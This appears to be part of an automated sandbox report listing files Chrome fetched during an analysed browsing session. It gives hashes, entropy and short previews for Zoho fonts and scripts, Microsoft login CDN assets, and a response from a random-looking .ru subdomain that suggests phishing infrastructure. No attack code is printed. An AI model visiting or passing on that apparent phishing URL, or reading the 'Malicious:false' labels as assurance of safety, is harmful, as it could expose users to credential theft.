                                                    Preview:var EditorView,DocEventTarget=function(){"use strict";function e(){this.events={}}return extend(e.prototype,{addEventTargetListener:function(e,t,i){this.events[e]={callback:t,context:i}},removeEventTargetListener:function(e){delete this.events[e]},dispatchEventTarget:function(e){if(e&&this.events[e.type]){var t=this.events[e.type];t.callback.call(t.context,e)}}}),e}(),DocEventManager=function(){function e(){this.eventTarget=new DocEventTarget}return extend(e.prototype,{bindTargetEvents:function(e,t,i){this.eventTarget.addEventTargetListener(e,t,i)},unbindTargetEvents:function(e){this.eventTarget.removeEventTargetListener(e)}}),e}(),DocViewSelector=function(){var e=function(e,t){if(this.type==e&&(!t||t(this)))return this;for(var i=this.getChildren(),n=0;n<i.length;n++){var r=i[n].querySelector(e,t);if(r)return r}return null},t=function(e,t){var i=[];this.type!=e||t&&!t(this)||i.push(this);for(var n=this.getChildren(),r=0;r<n.length;r++)i=i.concat(n[r].querySelectorAll(e,t));return i};re
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 72740, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):72740
                                                    Entropy (8bit):7.997063667705034
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:4C5229B81CED399EAB0804408F2C3C62
                                                    SHA1:C145564683735D0AB92F1A553FDD9607F3702A26
                                                    SHA-256:5AF331A730B5CAEE3CFD235C47CD07B1C36A61A31E8613CDA0484400732F63CD
                                                    SHA-512:CC12E7D38CFB426558F6BD857A16E36388303F545F875961B0C8AD9F1CBD8AFE9FA8C1648F016721384F24E538895E66DB81F6EDE6A49DF1E7CE9D070F218B3C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotobolditalic/font.woff2
                                                    Preview:wOF2.......$..............#.....................?FFTM..~...$..L.`....J..<.....|..F.6.$..8..... ..N..f...[.....c..=@4\Q;G..*u..}..s.1...U=d.>B......;^..m.D...zv.......L*.,.]e'E....Qx0....0fY.....J..1"c..!........i.D...Z.. .I.,...P.....j..x..8%..Z....]cTI.........U.TP9.......S.tP....p.F.ZFY.v.[....;w..O.3.j...7....w5.$.hp.w...i.f..h)..4....I..4.7c...pL.".).s[.4C.*...sU4M......mB.~........(..a.;&.....U..*nx.lI.S%/|"l2...-v."..p...!.l^.QV..0.H|.X.y.w|.5W.P...l"..N.~...&...#........q..!...l.Y...?QK..b...L..r.{Iz.5....inT/..L].TW.iy.:n.U.....Q.A..<..[...LC.q.|......{..V.).%t@..$...hs<.....7.e.ZXb..%.....h.%.0.N=.@D....%,D..LN..0..1..a.Vn.'~m....a...D.ED@.@.^....T......<.3......J......._..[].$.d.....H1q. Y........m,.6...G.H.H...FEJ.O..i"#-@lLTP^.$J.E.{....]..;...J..-l...M.J,LM.8.G_$.*x..{.]3..s...)M.X.h....F0.Akm6.p.{Jd.....77 .e.m....s.{.\.9..i..D..^......G.*A...:vd.,Y........S.y..*......e$o....s...X.h.E..P..(r..,......6D..9...#.t. zR....#(...Dr...aM.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1555
                                                    Category:dropped
                                                    Size (bytes):606
                                                    Entropy (8bit):7.684173827328528
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E9D4DB013D5154BF5DEA07A86EFDC826
                                                    SHA1:3EC26EF21230B139585C8A4DEE0EDACF21E645D9
                                                    SHA-256:1647D03E091826087EA981A97D69434D47CFE518EA4D41B09C198954F25E5D0C
                                                    SHA-512:4B0D3FF26B2F6433DFA1CD2E285073BC54C4040A4CEFF0C6AF3F32EA90729AF22C0EBF53277D7201C5D793D65AD64F2AD19A1BF3F31A0ED3695380128A5D76A5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..........}TMo.A..+..u..x.+@JO\z..UB..i......3^.......[.g.,..........w...s.8..pv...u...U..y.<.V..}..._wc.|.o..?W..Lg#........p<n..r.-?.q.=...Y.!ANQ54....b..Ae0...\... .....Q.0.......2..~U.5.h..1o....<.G...C...jhZ.r..i.a*....19..$...[.!..+.2IW.....v.l....Y'.m'}%..I..{.\.0.d.D...X......cI].....7.k._..{|..\$...&..G..q.H...../.q......j....q..z.&.....X..sNp.N"1..h.`;j....q............C.....^...........j(. ..x.V....D.'.I...j@..(V.V.....!........!E.<..X-....R....U<.l.Qn.2..K.VP2UEtl#.,8..H..3..sp...(0.7....K...j..6.......M....p.E..d..((../..@.....&G...^.........z..............
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (16485), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):16485
                                                    Entropy (8bit):5.306940646185465
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:49AF9453E84A742EE258E31C2AA20DCC
                                                    SHA1:91C45EABB4191372C66F6C0434F0A1C31B712025
                                                    SHA-256:284376ABD3E6808B3E7DE9AFF3185DD432AA3372DD9980FA504A4DAACEA1CD9C
                                                    SHA-512:59B4FFCD19F52B19989B0DA013D10D62CE9A3BBE74E869FDDBF9957EA4EF9389BB3820909F08E32E9F5A84C5D5CA3A6FF36123F3CF92A09EBDA41836153EDAF1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:var wmsconnectorframe,isWSSupported,setWSSupport,authtype,rtcatoken,rtcptabid,rtcpnname,unregister,onUnregisterSuccess,pdomain="*",wmslasttokenrefresh=0,isConnectivityInitialized=!1,isWMSFrameLoaded=!1;function triggerbind(e,n,t){e=e||getZuid(),n=n||getRawSid(),t=t||getSid();var i={uid:e};n&&(i.rsid=n),t&&(i.sid=t),wmsconnectorframe.contentWindow.postMessage('["bind",'+JSON.stringify(i)+"]",pdomain)}function triggerRTTPing(){wmsconnectorframe.contentWindow.postMessage('["triggerRTTPing",""]',pdomain)}function abortBind(){wmsconnectorframe.contentWindow.postMessage('["abortbind",{}]',pdomain)}function clearAndRegister(){var e={config:getWmsConfig()};wmsconnectorframe.contentWindow.postMessage('["clearregister",'+JSON.stringify(e)+"]",pdomain)}function setIdleStatusInClient(e){var n={isidle:e};wmsconnectorframe.contentWindow.postMessage('["sessionidle",'+JSON.stringify(n)+"]",pdomain)}function updateOAuthCredInBridge(){wmsconnectorframe.contentWindow.postMessage('["oauthcredentials",'+JS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):48
                                                    Entropy (8bit):4.579448698502606
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DA447B85CCF80FAFD35E64CB2461114B
                                                    SHA1:8C84CFF77DA8097EC74D11A91B75B0165CDE2A8A
                                                    SHA-256:81491C4F87AA1428FB8CACD409C77493264D1A3F322B2ACBD674E7CB0EA1B5C7
                                                    SHA-512:E1E622C3A8DCED72BDCC5B63086221A92D696A41957D6D98308B4F94C12E5C52439BF577C86B7F97443C6A026FBFB7E5BA304BE4E2E57DDEB77B2DF434A4DE50
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://wms.zohopublic.com/register?prd=WR&zuid=-1&config=79&dname=Guest&authtype=4&useagent=true&publickey=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtJW4YAZvATsp5OLv1dZGr9KJPbfAJFNz2vrX0QIE7ESaZ7rdwzJ89NrKM%2FZJpaJFG9sy6Ua39g6OYcsif1Deat7SceOpdn8Etzc9fm%2FrvW12V%2FBLv9CPBo0JfL%2BVSxxufvjlIlOvZaiBpBOQTZMOb%2FEIWkWgnncpWHU1MmCzRvCAOaZ3mGdL8MUIN64UDI1s3BEsokZYL9JGTqXX3GNvrmrqC4L0QCXZHn7SHsICYbt6fXhAnSQhoHIgZRcI6OqURsGPzsSsW82DoqPSk06oMy4wWQ%2BpDUmLdC8xCmWqw8IWxaLHOatP25In7TUopPstp0uzqbFQmkisUbxoG4iUfQIDAQAB&domain=a&page_visible=false&nocache=1736357519934&tid=-1_WR_1736357506852_8595
                                                    Preview:[{"reason":"Invalid AuthType : 4","mtype":"-5"}]
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                    Category:downloaded
                                                    Size (bytes):20410
                                                    Entropy (8bit):7.980582012022051
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                    SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                    SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                    SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                    Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:GIF image data, version 89a, 352 x 3
                                                    Category:downloaded
                                                    Size (bytes):2672
                                                    Entropy (8bit):6.640973516071413
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:166DE53471265253AB3A456DEFE6DA23
                                                    SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                    SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                    SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                    Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:very short file (no magic)
                                                    Category:downloaded
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://j3aziewrw1iysjb7r2eip84ech8dxg8q5ot1uitirck9qncxvuobqqw.sprocubseq.ru/tzdgnfujnhzdtonjcbQoKGdFTIRCTFHJCHILYVQFLJJGCYXEYMXLBUMMAXURTNGBRKCANYAHRMNSFB
                                                    Preview:1
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 74752, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):74752
                                                    Entropy (8bit):7.9973959292579835
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:73F83B04B50CF0AFC09A21A6F61A27E1
                                                    SHA1:B8B4226F70D52B39581FB0DC1366C2D2AB9D75B8
                                                    SHA-256:DC5C7077C0D9895A12E2A985F5F5008F298FE3A100CE129DEA533BADCA8D31DF
                                                    SHA-512:E2D45BC3646C735A42EC3B2004D0E824EE31D6A9BB4137F73CDB903538D21B343B6BED10B3B04DFC0A77FF92E6E1B89E4FF2AE49028431270F298374C1CFEF08
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotoblackitalic/font.woff2
                                                    Preview:wOF2......$...........#...#.....................?FFTM..~...$..L.`....Z..<.....<.. .6.$..8..... ..4..f..8[]......L.[........:ke.G...aa........A.{....G.UK.mZ.(..........7/..0-.....w..!".umId. ..Z.s.f(..{....b.nnm..Fc..*u.}..N...}-.../..w......Wo...B.6.xH.....).L..8....a.A....>FD....m.t....x.... .X..D2.SI...X..].L.....(.sG..M1.....h.2...}...S..0.......>.!..6.)..qu=.N. hk...u.E..l.S..*.4.L.{....6.Q.S.."Pn..-Uf..9.......D?...V.....6...Xj.q..X.P}..u.....<e._.....K.T.n....Y=/1.......x|.QO.V.9.c..&..;...A...R.0...........Tn...w...Y|.4...bUN;....*.J/YN?.,..sg.._..!`.E.A....|v.\..:..n\.....I1...(k...T..:U..Q...g..g....V.K.U{....CTB:t....!.\2......%.{[.}...g..+..,#ad.9..C.#. .#......s.}o".a`.........."e..E.R@.DQ,0.L...s]7..UW7.....}...R.J*.|}.......z..!..{...{...=...&..|...w..bT.S..t.%J.8J.4............#....?.lC!....=..z8.........^.(.h...#k&..x#... .IZ..45..w..'f...j'f...r.j...I.4I.T..`S....p..I.!$.........9....s.s..-.....3p.L.`.....3.=.gD.M.(~[.]..D.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 236244, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):236244
                                                    Entropy (8bit):7.998179475339988
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:8DC28986A8EFACADB5462AE5F3FE1CC4
                                                    SHA1:286AE3D4367F26F72C4A680533379F6AD30AB5D9
                                                    SHA-256:6CBA6597144D03C950FDFE06E9C7F7DAAC0748D95385979A603B2C12E9685ED2
                                                    SHA-512:FD002E05C8CFCF1C842539218E2C6DE8238ED15EAD5E6B8183782FBD949230FCFDCB985D1BC5F7812670683C9FC3F0454A5E549C5EEC37A7D9851C711866D529
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2italic/font.woff2
                                                    Preview:wOF2...............4...t........................... ..l.`..&..f........,..H.6.$..<..@.. .... ..9[y.../S.wE~.\..."........t..6F. I.....3...l............J...T(8..PRB..S.d=..3|.................................,.p..Kw/.$h.....+...:a..A.,....)...Y:..A.\6.wa5...0.35....0CR........H.Ac..j.... ......\"..H$...Y'..]..nd=.......R..I....m .......8.&.|mqN...!...P.w.....7J.........(.....I(I..:P\D...r.X.B.0I.hJu.j.+...^.......fGY.Q....%,N..R........ZO.."=&A...qL.H.sHI..$.7.8E#$.".]...L9.Vi.....%.(.$G...V.f.v..3.C._..hZ.K..,._..7.Z.4.E..OJ.Sl....]F.>)...I...........m..J.4..q..;...].f..(.Q....=...[.po.Fa5..^......49..r&Q-..Q...}(2....9.L..M....B.....A.b.(Ku.30@...8..@..)!=..#|..`#.........p<c..:1.DJ.:...T..f.|.4..O:.3^c.G*..hPfYR..i..X..D...P..P.5.k.t:..Q.a.. .S...&.x...i..R...%..7`.T.?cZ..s.|^..f..rsP....yv..Nv......y..W.+...s.\r.-?FK)h....6.....$M...y..Y.....t(P..J.C..:.pGE..Vi.N...%.zT.t.*P..i.p..P..l..:/......U....Fh....Ni.)RU......cB~F.1i...&f.x..&
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 64448, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):64448
                                                    Entropy (8bit):7.997153715675562
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:DF3E0129E6448FA09A859860FCC6AF55
                                                    SHA1:652B3736E9B2A6AE2BF9158B6950C063D64273AC
                                                    SHA-256:D5E52E6C3CFD7F6377DC4FAAE58620B5CD0E5E31BF4C60744AE1D548ED9287FA
                                                    SHA-512:276ACD7B554098542FE1BC305AB8BC81C6A5A52EBBA4F5EA78C8125C2AFD360F40A098A5C14B29FD803DC33016789FC1D7D81539A6731A23C944DADF1E6076E1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Light.woff2
                                                    Preview:wOF2OTTO..........l....m..................................p..*.`..X.6.$..8....<. [.k.....e...m..:e.\..(....A[....0u..{.X3.5...s.YB.{..<.......X*2T..vH..(.}.u.._.L:."R`.a2e..Q[...RN.kB-.........eo~m3.W$.V..8..pr3.&.......l.........k.=L....O....q.7...!j.5..M.......A. .M.R<..G,.D..../..|s.9....A.&.U.&\.....M..;.U....J.x...w........)...=..S.F..E.9........b..e..j..b.(<.n._TwW?.[.E...\..'PkTiw.....Z...-Z....i..CT.C...)?J................*.....</._..-....{.b.....q..(*-.&Xj.7y.........nc........@.." ....Rb..A0..d..9`..!."%.1.a.<....;.*.."(.""""><..._.~...ci..c.\ig..f..+;x.....?..w...N..........I..~.=..>..F....d....(c.-+.....x.....o...7...'.3..;B.!..V..BM.>C.....B5.a.&6.`.:..s......z.R7.W.bh.#.0....h...j3..........FV.trv....KK...g&...x.?%.%@!.j.[.Y...U..w_.....=.\m'Jk./.@$D.G.4...%.....jk....`.y2...4..L..?.%.v....fwZ3&..\...0rm..;.nLk..D..@B.Q.}s......4A.Hb.x*7q`aD.t..y.u;...#...+'.3d.F.4j&..(.....#...}.f..1..I.d ..P..5...@.@7Y.1\.Tm].1.d.'..$m......
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 61020, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):61020
                                                    Entropy (8bit):7.996511156934775
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:DE9D7D8C6A8B8EC8116BC977C5A5D0CE
                                                    SHA1:23F681E724CA0968593F9484D5387978D197D54D
                                                    SHA-256:B0D36CF553006934043386DF23E82B1F72E3AB008757578D489005AB8DA00500
                                                    SHA-512:1EB47756E038EF4A07A0D189BC90335892A4B3A9B5F9A8069360F9C039232D7F8F01BD25DA48DCBDA87EB77FBBC25A50A3F44C0C9E3C0CD240E39BCC83F73CB7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Thin.woff2
                                                    Preview:wOF2OTTO...\.......4......................................t..*.`..X.6.$..8...... [\.........L..\...d..._....;.S.mH9....x..l.....,.h.w........$...K^.Ixx@Q.Ju..v..0..&-....g.BF.*..a$LP4.4.........._..Z.9d.e.g.. \....Q.....I....T(Y`h..p..U..9....7...w. .J.h..L.........Jh.IiSf(..<.c.}m..x.<Gm.w..M^]%2.s..pV........:.-3G..df..ck...-.T>..b.k..8..H.B.D......j...PG.k.+..Y.0,..i.P.=K>..k,..DO.k<.#......\.:x..~^..O.+..[:.D".U.1.~f..tn<.............j.W..h.."R<l....P0aR..o@.....X...........>}.........e.tUX.S.0.1cV.".W&.(.]..6Q.....\.........."....C|?_.......k.\iY.zv..]9.s.ZVv~.l.?.....U..9.....A.`..)j"..O.t].<}.4[.%Mi.b-...`.[Z.33g.........pJ$m. .e.$|j.2..Zvs..3......1..........-.G...B.....Z.C.....f{X......DH.....1T_.d..h[z8......8.rQAD.....8p...t~.c.._...|.=.;3o...d.:+..B.X.`H1......B....&>...U.m...qKWj...k.HH...h...{...S....J(.=.,...........-..B..........F..F6......Y.B.R...,..B&R.L&.+.:.z`..j_...Cz.k.....\..N&Y..3...Cw...r.W....'..3.. ..O.H.:P%.<.*P.b5.<.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                    Category:dropped
                                                    Size (bytes):5525
                                                    Entropy (8bit):7.961202222662501
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                    SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                    SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                    SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 71200, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):71200
                                                    Entropy (8bit):7.9969953596009145
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:4BA2D52E2A04714D06FD2E4344F8A887
                                                    SHA1:9A492F85B0D4AFB377A2B99E5C529336F3A9CAFA
                                                    SHA-256:FB725AFFD5C86F63E6063188C4B75ABC4059F564FEEA94B605AAB333B55206C4
                                                    SHA-512:1BCF021EB426A90F9C079D74461BB58BA1D0C8288273F0ACE11BE3747E21BC3F06796920D5F590423F6803FB4CB1A34E0C60739526A09FC1D1916B5FDCCFFB4C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Extrablack.woff2
                                                    Preview:wOF2OTTO... ......)...................................h...j..*.`..X.6.$..8....v. [.(r..D:e&..-.sD&yO.V...Q52.7V@.-D.x.t*.0...+..Ye.o.......??...nG......iYF...ldF.....Q}.a.<0!0.i\!,N....G..`...3E)MfU..K.b.x.....q..yq...5..$.L..G....Y....8..D/B.I....P......w?...U..T.lD .]U....e+.....~8V.t.$.t.C...H.iu:Z\5..1.&.*Q.JT_.w.Np=............W...:q.6.g.q..b.O~...7'....^./.H..N.l.....).D..f..K...h..........E..m..1cV/.q6[b.s.?.2.c0O......X..Ut..i..@...U...H<.P.."...R.q.I.<.?.}..?M.yjd.....2.4.N...T.. o.{.6.l...0.|.|.,..<Ob-.<..$I..$IT.$IR.....SI.\I2...Oc..\...7.A#$.Y.k.. Y....o...?O..~z......O......"FK(.PJ...S0R.Er.2..,.#(dD...I).Ha.~.v..1#G`.>..B..=......;#.....Z.../...,[&..Jk.K-..$...4...y.3l.K......+.. ..>..:.]y..B..I.....N4..X....?.w6.?..o....1.1.E.A.f..S&*.J.,."I...1....5...l...)....i*/...)....Vj......Im@.3+.#.Cd.Tl.N7c.2......(.K:3._.~..k+.|......S.V......v..M..d. @...P...AJ."..........^..I&. ..D...V2TmN..f.....$c.ga.E'a.6.."e.g..'..o..(..M]U.)..%.J..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 73292, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):73292
                                                    Entropy (8bit):7.997118279967017
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:B643F825B6A813FABF5FF7F3260CE1FF
                                                    SHA1:B5CDA79DA053EF75F0380DB0681428561C9603B9
                                                    SHA-256:1C5E0A676D5344E404CABE0E1BDAB738468D50087109C13F9E20AC26758CD5BA
                                                    SHA-512:273CFF48986616B6CF4E75EBB6166D3437C4A0D9D3AC61A7EF65D2C5288D8405E356F1FA5849AC30695BA51CB84DC40B428883C40F71CFC989F4E1FEE42A60A1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotolightitalic/font.woff2
                                                    Preview:wOF2.......L..............#.....................?FFTM..~...L..L.`....X..<..... ..k.6.$..8..<.. ..4..f..?[U...ir.p........\..#......0..y...5.......p; .../........[:B[.[.\...UP.<""%.I.U.Z...a..E.b@Q.b..4....@.(...T.i<.wc=..`...u]/e....n4u.p.b...+.v86.....S7MFl.#u.Uc0...a.{..a..:PQL....k.]BB.....cD.JQFX.%.h.;v.I.5.....(,.$....Ao."..KlR.s.[I.......U...cr..m.e.B?.FS.......lwn0d'<G].......-6.Ds...D..V...g7.G..D.Y.."&...;.l...a..#...X.].P)A......:u........LB.*.M..C.W..+B... .s.eM.iIO0.'.{;...Z..._.....]uu...~.:o.....P.6.8...lZ._.@.'./?.G.....O..GF......D/0F.2..#...F=D.....i\.\..E.b..Kr.1bB...")"Z..B...Z...<...s.}/q..@wR..;..T&5R.....Xpp.p.w[..X).y....m.r........q....}.?k;...$KR.n.k..).......=.|{3s..].M.@.....S$i..~.4.v.`..DKX( `.*.#6j0`,..K*.R.R....b..`%...z...(.X...NP.D.........^g.^.nm..g..`.a.~.wk..I....Zz(/.l...M.4M.hT.-Yn[..R.^.....r.}......`....Bi z.[vq...`lp......EV..&7..[...Z..xH.:./...4..R.j3....Y.+g%=....~....E.<.{.].@.p..n.].n.~....!0....@}....%qW.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):1807594
                                                    Entropy (8bit):5.45247646329722
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D00DD80F680872BBF47C3478A1885A7D
                                                    SHA1:7BF83787B5B8AF0792B2278A35D6AA714EB2FBCC
                                                    SHA-256:E1512581FE4F71AE6B510FF26F494B1D3B9271C82C7B72112AB623C142671987
                                                    SHA-512:B2FD2040D4003FEB697467C3DDF0B495CF886436EE7C51150DCF20F0C09C59BDA06FE08B79DD38FED1F2203E067904E9FFCF64707148EB4F16A95FD1D7B3FF49
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://js.zohocdn.com/ichat/js/Jan_02_2025_9731896_wmsbar.js
